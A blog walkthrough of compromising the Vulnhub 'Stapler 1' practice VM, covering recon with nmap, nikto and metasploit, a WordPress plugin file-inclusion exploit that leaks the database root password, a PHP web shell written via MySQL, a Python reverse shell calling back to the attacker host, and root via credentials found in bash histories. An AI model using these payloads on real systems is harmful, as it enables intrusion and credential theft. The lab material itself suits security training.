Stapler 1

Finally getting back to purpose of this blog! I know I'm going to be rusty, but let's dive right back into the original Vulnhub plans. This one was nice and easy to get running: 1 Diving right in, here's the nmap result:

Nmap scan report for 10.10.10.10
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)

ftp is going to be a target no doubt, we also want to check out what's running on that port 80, and we love seeing a webserver with mysql! Doom on port 666? That's a troll for sure - I don't know anything about lan doom exploits, yet. I searched exploitdb for doom, no hits. The webserver's root page renders this HTML: 2 I ran dirbuster on it with no results... we'll come back to this. I ran the metasploit module to identify the FTP version:

msf6 > search ftp_version
Matching Modules
================
   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/ftp/ftp_version                   normal  No     FTP Version Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/ftp/ftp_version) > run
[+] 10.10.10.10:21        - FTP Banner: '220-\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-| Harry, make sure to update the banner when you get a chance to show who has access here |\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-\x0d\x0a220 \x0d\x0a'
[*] 10.10.10.10:21        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Looks like we couldn't get a version... however, we now know that an admin user's firstname is Harry. I decided to connect to the server and see if the status would disclose a version, no dice:

ftp> status
Connected to 10.10.10.10.
No proxy connection.
Connecting using address family: any.
Mode: stream; Type: ascii; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off

I circled back to the HTTP port and started up a more robust traversal tool, dotdotpwn and after it ran for about 30 minutes (I was cooking food) there were not hits... Surely the webstack here isn't for nothing... I ran nikto:

└─$ nikto --host 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        80
+ Start Time:         2021-01-02 18:00:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2021-01-02 18:00:50 (GMT-5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Interesting, apparently the server is disclosing a .bashrc and .profile response? Let's check it out:

└─$ curl 10.10.10.10/.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
	# We have color support; assume it's compliant with Ecma-48
	# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
	# a case would tend to support setf rather than setaf.)
	color_prompt=yes
    else
	color_prompt=
    fi
fi
if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'
    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

Nothing of interest there, except the fact that we can seemingly read the filesystem of the user's home dir.

└─$ curl 10.10.10.10/.profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
	. "$HOME/.bashrc"
    fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

I tried poking around to read some other common files... but realized I don't even know what OS this is running yet! Let's run a better nmap...

└─$ sudo nmap -O -p- 10.10.10.10
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 18:18 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.10
Host is up (0.00043s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.14 seconds

Not the most useful OS detection, but we've found a new service!

$ curl 10.10.10.10:12380
...
big html response
...

Loaded in a browser: 3 Okay this looks more interesting... Nothing in searchsploit for creative tim. Nikto against the port:

─$ nikto --host 10.10.10.10 --port 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2021-01-02 18:27:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.10.10.10' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7993 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-01-02 18:30:00 (GMT-5) (143 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First searching the apache version, it's vulnerable to a local priv escalation we may be able to use later on. Now, I tried phpmyadmin, but it just redirects to homepage. Actually, it seems like everything redirects to homepage. Perhaps HTTPS has different behavior? I tried https /admin112233, and I think I got rekt... 4 I'm not sure what BeEF-XSS is, but I certainly should! Wow yeah I still have a lot to learn... It's essentially an exploit-kit, open-source and ships with Kali. I guess I should be blocking JS execution in my browser. Moving on, if I use Https I can load the phpmyadmin page! Great news. A few default username/passwords didn't work. Here's the robots.txt:

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

And finally, we get a little blog on /blogblog 5 I clicked the login button, and got a wordpress login page: 6 You love to see that, this may be the end of the road... from the msfconsole:

msf6 auxiliary(scanner/http/ntlm_info_enumeration) > use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) > info
       Name: Wordpress Scanner
     Module: auxiliary/scanner/http/wordpress_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Christian Mehlmauer <FireFart@gmail.com>
  h00die
Check supported:
  No
Basic options:
  Name          Current Setting                                                Required  Description
  ----          ---------------                                                --------  -----------
  PLUGINS       true                                                           no        Detect plugins
  PLUGINS_FILE  /usr/share/metasploit-framework/data/wordlists/wp-plugins.txt  yes       File containing plugins to enumerate
  PROGRESS      1000                                                           yes       how often to print progress
  Proxies                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80                                                             yes       The target port (TCP)
  SSL           false                                                          no        Negotiate SSL/TLS for outgoing connections
  TARGETURI     /                                                              yes       The base path to the wordpress application
  THEMES        true                                                           no        Detect themes
  THEMES_FILE   /usr/share/metasploit-framework/data/wordlists/wp-themes.txt   yes       File containing themes to enumerate
  THREADS       1                                                              yes       The number of concurrent threads (max one per host)
  VHOST                                                                        no        HTTP server virtual host
Description:
  Detects Wordpress Versions, Themes, and Plugins
msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/http/wordpress_scanner) > set RPORT 12380
RPORT => 12380
msf6 auxiliary(scanner/http/wordpress_scanner) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /blogblog
TARGETURI => /blogblog
msf6 auxiliary(scanner/http/wordpress_scanner) > run
[*] Trying 10.10.10.10
[+] 10.10.10.10 - Detected Wordpress 4.2.1

Searchsploit for the version:

└─$ searchsploit wordpress 4.2.1                                                                                                                                                                            7 ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Core < 4.7.1 - Username Enumeration                                                                                                                                 | php/webapps/41497.php
WordPress Core < 4.7.4 - Unauthorized Password Reset                                                                                                                          | linux/webapps/41963.txt
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion                                                                                                              | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts                                                                                                       | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                                                                                                                       | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)                                                                                                   | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                                                                                                           | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities                                                                                                          | php/webapps/38176.txt
WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload                                                                                                          | php/webapps/18991.php
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                                                                                                                     | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                                                                                                                   | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation                                                                                                               | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass                                                                                                                   | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation                                                                                                    | php/webapps/46083.txt
WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting                                                                                                                      | php/webapps/36180.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Knowing the users could be useful...

─$ cat /usr/share/exploitdb/exploits/php/webapps/41497.php                                                                                                                                               127 ⨯
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk 
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
	echo "*-----------------------------*\n";
foreach($json as $users){
	echo "[*] ID :  |" .$users['id']     ."|\n";
	echo "[*] Name: |" .$users['name']   ."|\n";
	echo "[*] User :|" .$users['slug']   ."|\n";
	echo "\n";
}echo "*-----------------------------*";} 
else{echo "[*] No user";}
?> 

I tried 'https://10.10.10.10/blogblog/wp-json/wp/v2/users' and 'https://10.10.10.10/wp-json/wp/v2/users' to no success. Every wordpress site has a wp-content directory where we may be able to find plugin's that are installed, which ended up being true! 7 Searching these on exploit-db...

└─$ searchsploit wordpress advanced video       
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                    | php/webapps/39646.py

8 And nothing for two-factor. ShortCode was the most interesting, so I checked the version, which seemed to be 0.1, but then i realized shortcode could be all sorts of things. I think it's best to try to local file inclusion vector we were first presented with...

#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
#	Timeline
#	03/24/2016 - Bug discovered
#	03/24/2016 - Initial notification of vendor
#	04/01/2016 - No answer from vendor, public release of bug 
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
import random
import urllib2
import re
url = "http://127.0.0.1/wordpress" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read() 

So, I made a copy and edited the url to match our target, and ran it:

└─$ python x.py 
Traceback (most recent call last):
  File "x.py", line 41, in <module>
    objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 429, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 447, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1241, in https_open
    context=self._context)
  File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
    raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)>

Alright, a bit of stackoverflow later to disable ssl validation for some reason all failed, so I just ran it manually:

$ curl "https://10.10.10.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=100000000000000000&short=rnd&term=rnd&thumb=../wp-config.php" --insecure                                 60 ⨯
https://10.10.10.10:12380/blogblog/?p=290 

This uploads a file into wp-content/uploads: We can then download the file and printout the contents to get the wp-config file!

└─$ wget --no-check-certificate https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
--2021-01-02 21:45:08--  https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
Connecting to 10.10.10.10:12380... connected.
WARNING: The certificate of ‘10.10.10.10’ is not trusted.
WARNING: The certificate of ‘10.10.10.10’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘10.10.10.10’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘305460154.jpeg’
305460154.jpeg                                      100%[===================================================================================================================>]   2.97K  --.-KB/s    in 0s      
2021-01-02 21:45:08 (111 MB/s) - ‘305460154.jpeg’ saved [3042/3042]
                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/tmp]
└─$ cat 305460154.jpeg                                         
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);

Now we have the sql root admin and password! Logging into phpmyadmin, bingo! 9 The version of phpmyadmin running isn't vulnerable to any common exploits, let's move onto trying a root mysql shell.

# Login as root on mysql server
$ mysql -u root -p -h 10.10.10.10
# Switch to known-existing database
sql> use wordpress
# Attempt backdoor
sql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
# Locally
$ nc -lp 4444
# In browser:
https://10.10.10.10:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.9%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
# Reverse Shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
4.4.0-21-generic

I search the kernel version, and there's a ton of priv-escalation vulnerabilities... but let's explore a little first and see what else we can do. Get a bash shell:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/home$ find . -readable
find . -readable
.
./MFrei
./MFrei/.bashrc
./MFrei/.bash_history
./MFrei/.bash_logout
./MFrei/.profile
./Sam
./Sam/.bashrc
./Sam/.bash_history
./Sam/.bash_logout
./Sam/.profile
./CCeaser
./CCeaser/.bashrc
./CCeaser/.bash_history
./CCeaser/.bash_logout
./CCeaser/.profile
./www
./www/.bashrc
./www/.bash_logout
./www/.profile
./DSwanger
./DSwanger/.bashrc
./DSwanger/.bash_history
./DSwanger/.bash_logout
./DSwanger/.profile
./JBare
./JBare/.bashrc
./JBare/.bash_history
./JBare/.bash_logout
./JBare/.profile
./mel
./mel/.bashrc
./mel/.bash_history
./mel/.bash_logout
./mel/.profile
./jess
./jess/.bashrc
./jess/.bash_history
./jess/.bash_logout
./jess/.profile
./MBassin
./MBassin/.bashrc
./MBassin/.bash_history
./MBassin/.bash_logout
./MBassin/.profile
./kai
./kai/.bashrc
./kai/.bash_history
./kai/.bash_logout
./kai/.profile
./elly
./elly/.bashrc
./elly/.bash_history
./elly/.bash_logout
./elly/.profile
./Drew
./Drew/.bashrc
./Drew/.bash_history
./Drew/.bash_logout
./Drew/.profile
./JLipps
./JLipps/.bashrc
./JLipps/.bash_history
./JLipps/.bash_logout
./JLipps/.profile
./jamie
./jamie/.bashrc
./jamie/.bash_history
./jamie/.bash_logout
./jamie/.profile
./Taylor
./Taylor/.bashrc
./Taylor/.bash_history
./Taylor/.bash_logout
./Taylor/.profile
./peter
./peter/.zcompdump
./peter/.bashrc
find: './peter/.cache': Permission denied
./peter/.bash_logout
./peter/.sudo_as_admin_successful
./peter/.profile
./SHayslett
./SHayslett/.bashrc
./SHayslett/.bash_history
./SHayslett/.bash_logout
./SHayslett/.profile
./JKanode
./JKanode/.bashrc
./JKanode/.bash_history
./JKanode/.bash_logout
./JKanode/.profile
./AParnell
./AParnell/.bashrc
./AParnell/.bash_history
./AParnell/.bash_logout
./AParnell/.profile
./CJoo
./CJoo/.bashrc
./CJoo/.bash_history
./CJoo/.bash_logout
./CJoo/.profile
./Eeth
./Eeth/.bashrc
./Eeth/.bash_history
./Eeth/.bash_logout
./Eeth/.profile
./RNunemaker
./RNunemaker/.bashrc
./RNunemaker/.bash_history
./RNunemaker/.bash_logout
./RNunemaker/.profile
./SHAY
./SHAY/.bashrc
./SHAY/.bash_history
./SHAY/.bash_logout
./SHAY/.profile
./ETollefson
./ETollefson/.bashrc
./ETollefson/.bash_history
./ETollefson/.bash_logout
./ETollefson/.profile
./IChadwick
./IChadwick/.bashrc
./IChadwick/.bash_history
./IChadwick/.bash_logout
./IChadwick/.profile
./LSolum2
./LSolum2/.bashrc
./LSolum2/.bash_history
./LSolum2/.bash_logout
./LSolum2/.profile
./SStroud
./SStroud/.bashrc
./SStroud/.bash_history
./SStroud/.bash_logout
./SStroud/.profile
./LSolum
./LSolum/.bashrc
./LSolum/.bash_history
./LSolum/.bash_logout
./LSolum/.profile
./NATHAN
./NATHAN/.bashrc
./NATHAN/.bash_history
./NATHAN/.bash_logout
./NATHAN/.profile
./zoe
./zoe/.bashrc
./zoe/.bash_history
./zoe/.bash_logout
./zoe/.profile
# Printout all bash_history
www-data@red:/home$ cat */.bash_history
cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
top
exit
# Login as peter
$ su peter
red% id                                                                        
id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# Get root shell
ed% sudo -i                                                                   
sudo -i
➜  ~ id                                                                        
id
uid=0(root) gid=0(root) groups=0(root)
# Have a look at root dir
➜  ~ ls                                                                        
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  cat flag.txt                                                                
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b